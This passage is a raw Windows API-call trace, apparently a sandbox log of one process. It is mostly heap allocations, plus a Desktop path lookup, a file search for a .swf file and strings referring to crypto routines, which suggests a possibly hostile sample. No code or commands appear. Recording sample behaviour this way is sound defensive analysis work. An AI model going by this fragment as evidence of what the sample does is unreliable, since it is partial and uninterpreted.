(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0150.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.704] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0150.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53860 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0150.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0150.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0150.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0150.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0150.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0150.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0150.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0150.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0150.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0150.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0150.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0150.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0150.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0150.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0150.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0150.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0150.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0150.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0150.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0150.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0150.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0150.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/F Elbom0O1NrT.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2abfd0, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x17707a50, ftLastAccessTime.dwHighDateTime=0x1d5edf7, ftLastWriteTime.dwLowDateTime=0x17707a50, ftLastWriteTime.dwHighDateTime=0x1d5edf7, nFileSizeHigh=0x0, nFileSizeLow=0x9904, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="F Elbom0O1NrT.swf", cAlternateFileName="FELBOM~1.SWF")) returned 0xa87610 [0150.917] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0150.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0150.918] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0150.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0150.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0150.918] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0150.918] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0150.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0150.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0150.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0150.920] 